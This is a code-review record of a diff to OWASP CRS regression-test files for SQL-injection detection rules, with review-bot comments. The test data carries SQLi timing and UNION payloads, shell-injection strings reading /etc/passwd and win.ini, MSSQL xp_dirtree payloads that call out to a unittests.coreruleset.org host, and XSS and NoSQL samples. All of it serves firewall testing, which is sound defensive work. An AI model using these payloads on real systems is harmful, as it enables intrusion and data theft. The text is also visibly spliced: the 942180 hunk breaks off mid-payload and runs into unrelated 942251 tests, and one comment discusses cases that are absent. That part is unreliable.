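Review bot: All three cases send the payload percent-encoded in the `User-Agent` header (`encode%28lo_get%2816400%29...`), but header values are not URL-decoded by the web server, so these cases only pass if the rule applies a URL-decode transformation to request headers, while a real attacker would more likely send the header literally. Add a case with the raw form, `User-Agent: encode(lo_get(16400),'base64')::int`, so the rule is checked against the bytes a backend actually receives; the rule definition is not in this diff, so this is inferred from the tests alone. 942152-3 differs from 942152-1 only in the large-object OID (16200 vs 16400) and is redundant unless the rule keys on that number, and there is no negative case with an ordinary browser User-Agent string to show the rule does not fire on normal traffic.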
@@ -1,159 +1,175 @@ --- - meta: - author: "Christian S.J. Peron, Christoph Hansen" - description: None - enabled: true - name: 942160.yaml - tests: - - - test_title: 942160-1 +meta: + author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler" + description: None + enabled: true + name: 942160.yaml +tests: + - test_title: 942160-1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: 
localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=BENCHMARK(1000000, md5\x22 AND 1883=1883-- GSCC('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - - test_title: 942160-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BENCHMARK(1000000, md5\" AND 1883=1883-- GSCC('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" - version: HTTP/1.0 - output: - log_contains: id 
"942160" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" + version: HTTP/1.0 + output: + log_contains: id "942160" + - test_title: 942160-10 + desc: "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/if(now()=sysdate(),sleep(12),0)" + version: HTTP/1.0 + output: + log_contains: id "942160" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml new file mode 100644 index 0000000000..c3f0f366bf --- /dev/null +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942170.yaml 
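Review bot: Every `desc:` in this file, including the ones carried over unchanged, reads `SQL Injection Attack: Common DB Names Detected`, but the payloads are `sleep(...)` and `BENCHMARK(...)` timing probes, so the description was copied from 942140 and misdescribes what a failing case tested; something like `desc: "Blind SQL injection: sleep()/benchmark() timing probe"` would make reports self-explanatory. The new 942160-10 puts the payload in the path (`uri: "/if(now()=sysdate(),sleep(12),0)"`) to cover REQUEST_BASENAME per issue #1904, which is useful, but the file still has no `no_log_contains` case for `sleep` or `benchmark` used as plain words in a query string; 942170 in the same change has exactly such a case and this file could mirror it.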
@@ -0,0 +1,71 @@
+---
+meta:
+ author: "Franziska Bühler"
+ description: None
+ enabled: true
+ name: 942170.yaml
+tests:
+ - test_title: 942170-1
+ desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942170"
+ - test_title: 942170-2
+ desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?var=%3B%20sleep%280%29"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942170"
+ - test_title: 942170-3
+ desc: "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?var=I%20sleep%20well%21"
+ version: HTTP/1.0
+ output:
+ no_log_contains: id "942170"
+ - test_title: 942170-4
+ desc: "Status Page Test - SQL injection test with select if(x"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?test=select+if(x"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942170"
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
index 0ccec158aa..7dbbf80027 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942180.yaml
@@ -1,41 +1,137 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942180.yaml - tests: - - - test_title: 942180-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942180.yaml +tests: + - test_title: 942180-1 desc: "basic SQL authentication bypass" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # something simple like 3' ' 1 - uri: "/?var=3%27%20%27%201" - version: HTTP/1.0 - output: - log_contains: id "942180" - - - test_title: 942180-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something simple like 3' ' 1 + uri: "/?var=3%27%20%27%201" + version: HTTP/1.0 + output: + log_contains: id "942180" + - test_title: 942180-2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - version: HTTP/1.0 - data: "javascript:\"/*'/*`/*--> 5'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=%20HAVING%20COUNT%28CustomerID%29%20%3E%205" + version: HTTP/1.0 + output: + log_contains: id "942251" + - test_title: 942251-2 + desc: "Detects having injections negative test" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=having%20fun" + version: HTTP/1.0 + output: + no_log_contains: id "942251" 
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml index bfe986e552..0c440ab6f5 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942260.yaml 
@@ -1,381 +1,24 @@ --- - meta: - author: "Christian S.J. Peron, Christian Folini" - description: None - enabled: true - name: 942260.yaml - tests: - - - test_title: 942260-1 +meta: + author: "Christian S.J. Peron, Christian Folini" + description: None + enabled: true + name: 942260.yaml +tests: + - test_title: 942260-1 desc: "Basic SQL authentication bypass" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - # something LIKE ' - uri: "/?var=something%20LIKE%20%27" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-2 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=0.3480567293179807' UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-3 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=config.ini\x22) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-4 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=CRS) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-5 - desc: "Basic SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=CRS3\x22) UNION ALL select NULL --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-6 - desc: "Advanced SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: 
"var=abcd'||(select extractvalue(xmltype('%ptkjp;" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-7 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-8 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=0.84622338492032948`echo${IFS}crs312``echo${IFS}34test`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-9 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=`echo crs312``echo 34test`" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-10 - desc: "Embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=123-456-01@coreruleset.org'|ping -c 1337 127.0.0.1 #" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-11 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=1);declare @q varchar(99);set @q='\x5c\x5cj0kwbatxjfgjp0qu3ibonwovamgmkq8h05unittests.corerule' 'set.org\x5ckph'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-12 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=content.ini);declare @q varchar(99);set 
@q='\x5c\x5ci1kvc9uwkehiqzrt4hcnovpublhunittests.corerule' 'set.org\x5clri'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-13 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue', '4', '2', '7');declare @q varchar(99);set @q='\x5c\x5ch5nug8yvodlhuyvs8ggmsuttfklkcjunittests.corerule'+'set.org\x5cvcr'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-14 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test));declare @q varchar(99);set @q='\x5c\x5czwzc7qpdfvczlgmazy74jckb62cunittests.corrule'+'set.org\x5cgej'; exec master.dbo.xp_dirtree @q;--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-15 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=/config.ini' into outfile '\x5c\x5c\x5c\x5cil7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\x5c\x5cyxq'; --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-16 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=EmptyValue into outfile '\x5c\x5c\x5c\x5cjviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\x5c\x5cxct'; --" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-17 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=test@coreruleset.org\x22|type 
%SYSTEMROOT%\x5cwin.ini" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-18 - desc: "Traces of XSS" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=mytest>'>\x22>" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-19 - desc: "Advanced SQL authentication bypass" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22123-456-123@coreruleset.org\x22' and (select*from(select(sleep(10)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-20 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22tester@coreruleset.org\x22' waitfor delay'0:0:20'--" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-21 - desc: "Advanced embedded shell execution" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var=\x22-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "942260" - - - test_title: 942260-22 - desc: "Traces of XSS" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "var='\x22>" - version: HTTP/1.0 - output: - log_contains: id "942260" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # something LIKE ' + uri: "/?var=something%20LIKE%20%27" + version: HTTP/1.0 + output: + log_contains: id "942260" 
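Review bot: Tests 942260-2 through 942260-22 are deleted here and only 942260-1 survives, but the hunk does not show where that coverage goes — the MSSQL `xp_dirtree` exfiltration payloads (942260-11 to -16), the backtick/pipe shell-execution cases (942260-7 to -10) and the XSS traces (942260-18, -21, -22) simply disappear. At least one was relocated: the `waitfor delay'0:0:20'--` payload from 942260-20 reappears as 942280-2 later in this diff, which suggests the others may have moved to the rules that now match them. Confirm that every removed payload either has a new home or is dropped on purpose; otherwise this commit silently narrows regression coverage for whatever 942260 used to catch. If the drop is deliberate because the rule's pattern was narrowed, a short note in the file's `description` field (currently `None`) saying which rules now own these payloads would make the intent recoverable later.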
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml index a7795f27f2..bf16aaec72 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942270.yaml @@ -1,23 +1,39 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942270.yaml - tests: - - - test_title: 942270-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942270.yaml +tests: + - test_title: 942270-1 desc: "basic sql injection. Common attack string for mysql, oracle and others" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=union%20select%20col%20from" - version: HTTP/1.0 - output: - log_contains: id "942270" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=union%20select%20col%20from" + version: HTTP/1.0 + output: + log_contains: id "942270" + - test_title: 942270-2 + desc: "Status Page Test - SQL injection test with Xunionselectfrom (missing word boundary at the beginning)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=Xunionselectfrom" + version: HTTP/1.0 + output: + log_contains: id "942270" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml index 38fb259074..c0f6bff5d3 100644 
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942280.yaml @@ -1,23 +1,40 @@ --- - meta: - author: "Christian S.J. Peron" - description: None - enabled: true - name: 942280.yaml - tests: - - - test_title: 942280-1 +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942280.yaml +tests: + - test_title: 942280-1 desc: "Postgres pg_sleep injection, waitfor delay attacks and database shutdown attempts" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?var=select%20pg_sleep" - version: HTTP/1.0 - output: - log_contains: id "942280" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?var=select%20pg_sleep" + version: HTTP/1.0 + output: + log_contains: id "942280" + - test_title: 942280-2 + desc: "SQL Server waitfor delay attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=\"tester@coreruleset.org\"' waitfor delay'0:0:20'--" + version: HTTP/1.0 + output: + log_contains: id "942280 diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml index f1c2bab272..f93a3a0949 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942290.yaml 
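Review bot: The last line of the new test 942280-2 is `log_contains: id "942280` with no closing quote, whereas 942280-1 and every sibling file write `log_contains: id "942280"`. YAML accepts the unbalanced form as a plain scalar, so the file still loads and the substring check presumably still matches, but the expected string now differs from the rest of the suite and a later search-and-replace or linter will trip over it; change it to `log_contains: id "942280"`. The payload `"tester@coreruleset.org"' waitfor delay'0:0:20'--` is the one dropped from 942260-20 in this same diff, so the move itself looks intentional.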
@@ -1,39 +1,155 @@ --- - meta: - author: csanders-git - description: None - enabled: true - name: 942290.yaml - tests: - - - test_title: 942290-1 +meta: + author: csanders-git + description: None + enabled: true + name: 942290.yaml +tests: + - test_title: 942290-1 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: /mongo/show.php?u_id[$ne]=2 - headers: - User-Agent: ModSecurity CRS 3 Tests - Host: localhost - output: - log_contains: id "942290" - - - test_title: 942290-2 - desc: "basic MongoDB SQL injection attempts" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: GET - port: 80 - uri: "/?mongoQ=%5b%24lte%5dasdfsd" - version: HTTP/1.0 - output: - log_contains: id "942290" + - stage: + input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: /mongo/show.php?u_id[$ne]=2 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log_contains: id "942290" + - test_title: 942290-2 + desc: "basic MongoDB NOSQL injection attempts" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?mongoQ=%5b%24lte%5dasdfsd" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-3 + desc: "basic MongoDB NOSQL injection attempts 2" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + 
log_contains: id "942290" + - test_title: 942290-4 + desc: "basic MongoDB NOSQL injection attempts 3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/mongo/show.php?u_id[$regex]=2" + version: HTTP/1.0 + output: + log_contains: id "942290" + - test_title: 942290-5 + desc: "basic MongoDB NOSQL injection attempts 4" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$not": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-6 + desc: "basic MongoDB NOSQL injection attempts 5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$nor": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-7 + desc: "basic MongoDB NOSQL injection attempts 6" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$where": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-8 + desc: "basic MongoDB NOSQL injection attempts 7" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" + Host: localhost + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: POST + port: 80 + uri: / + data: '{"$elemMatch": "foo"}' + output: + log_contains: id "942290" + - test_title: 942290-9 + desc: "basic MongoDB NOSQL injection attempts 8" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Accept: "*/*" 
